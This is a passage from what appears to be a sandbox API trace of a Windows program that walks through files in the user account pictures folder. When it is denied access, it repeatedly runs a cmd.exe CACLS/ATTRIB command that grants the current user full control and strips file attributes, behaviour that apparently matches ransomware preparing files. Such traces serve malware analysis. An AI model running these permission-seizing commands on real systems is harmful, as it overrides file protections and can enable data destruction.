dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.070] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", lpFilePart=0x12eab4*="usertile35.bmp") returned 0x52 [0188.070] GetLastError () returned 0x5 [0188.070] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0188.070] LocalFree (hMem=0x1c6cc8) returned 0x0 [0188.070] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0188.070] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0188.070] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.070] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.070] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0188.070] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0188.071] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x84c, dwThreadId=0x42c)) returned 1 [0188.072] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] CloseHandle (hObject=0x1b4) returned 1 [0188.545] CloseHandle (hObject=0x120) returned 1 [0188.545] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] ReleaseMutex (hMutex=0xf8) returned 1 [0188.545] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] ReleaseMutex (hMutex=0xf8) returned 1 [0188.545] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] ReleaseMutex (hMutex=0xf8) returned 1 [0188.545] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.545] ReleaseMutex (hMutex=0xf8) returned 1 [0188.545] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.545] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", lpFilePart=0x12eab4*="usertile35.bmp") returned 0x52 [0188.545] GetLastError () returned 0x5 [0188.545] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0188.545] LocalFree (hMem=0x1c6cc8) returned 0x0 [0188.545] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0188.545] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0188.545] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.546] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.546] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0188.546] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0188.546] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0188.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.546] ReleaseMutex (hMutex=0xf8) returned 1 [0188.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.546] ReleaseMutex (hMutex=0xf8) returned 1 [0188.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.546] ReleaseMutex (hMutex=0xf8) returned 1 [0188.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0188.546] ReleaseMutex (hMutex=0xf8) returned 1 [0188.546] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.546] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", lpFilePart=0x12eab4*="usertile36.bmp") returned 0x52 [0188.546] GetLastError () returned 0x5 [0188.546] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0188.546] LocalFree (hMem=0x1c6cc8) returned 0x0 [0188.546] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0188.546] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0188.546] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.547] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.547] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0188.547] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0188.547] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9c8, dwThreadId=0x508)) returned 1 [0188.548] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] CloseHandle (hObject=0x1b4) returned 1 [0189.090] CloseHandle (hObject=0x120) returned 1 [0189.090] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] ReleaseMutex (hMutex=0xf8) returned 1 [0189.090] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] ReleaseMutex (hMutex=0xf8) returned 1 [0189.090] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] ReleaseMutex (hMutex=0xf8) returned 1 [0189.090] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] ReleaseMutex (hMutex=0xf8) returned 1 [0189.090] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.091] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", lpFilePart=0x12eab4*="usertile36.bmp") returned 0x52 [0189.091] GetLastError () returned 0x5 [0189.091] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0189.091] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.091] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.091] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.091] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.091] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.091] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.091] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.091] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0189.091] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.091] ReleaseMutex (hMutex=0xf8) returned 1 [0189.091] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.091] ReleaseMutex (hMutex=0xf8) returned 1 [0189.091] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.091] ReleaseMutex (hMutex=0xf8) returned 1 [0189.091] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.091] ReleaseMutex (hMutex=0xf8) returned 1 [0189.091] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.092] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", lpFilePart=0x12eab4*="usertile37.bmp") returned 0x52 [0189.092] GetLastError () returned 0x5 [0189.092] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0189.092] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.092] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.092] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.092] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.092] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.092] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0189.092] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0189.092] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x114, dwThreadId=0x748)) returned 1 [0189.094] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] CloseHandle (hObject=0x1b4) returned 1 [0189.247] CloseHandle (hObject=0x120) returned 1 [0189.247] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] ReleaseMutex (hMutex=0xf8) returned 1 [0189.247] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] ReleaseMutex (hMutex=0xf8) returned 1 [0189.247] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] ReleaseMutex (hMutex=0xf8) returned 1 [0189.247] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] ReleaseMutex (hMutex=0xf8) returned 1 [0189.247] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.248] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", lpFilePart=0x12eab4*="usertile37.bmp") returned 0x52 [0189.248] GetLastError () returned 0x5 [0189.248] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0189.248] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.248] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.248] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.248] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.248] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.248] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.248] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0189.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.248] ReleaseMutex (hMutex=0xf8) returned 1 [0189.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.248] ReleaseMutex (hMutex=0xf8) returned 1 [0189.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.248] ReleaseMutex (hMutex=0xf8) returned 1 [0189.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.248] ReleaseMutex (hMutex=0xf8) returned 1 [0189.248] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.248] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", lpFilePart=0x12eab4*="usertile38.bmp") returned 0x52 [0189.249] GetLastError () returned 0x5 [0189.249] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0189.249] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.249] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.249] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.249] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.249] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.249] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0189.249] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0189.249] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9a8, dwThreadId=0x90)) returned 1 [0189.251] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] CloseHandle (hObject=0x1b4) returned 1 [0189.586] CloseHandle (hObject=0x120) returned 1 [0189.586] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] ReleaseMutex (hMutex=0xf8) returned 1 [0189.586] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] ReleaseMutex (hMutex=0xf8) returned 1 [0189.586] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] ReleaseMutex (hMutex=0xf8) returned 1 [0189.586] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] ReleaseMutex (hMutex=0xf8) returned 1 [0189.586] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.586] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", lpFilePart=0x12eab4*="usertile38.bmp") returned 0x52 [0189.587] GetLastError () returned 0x5 [0189.587] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0189.587] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.587] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.587] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.587] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) 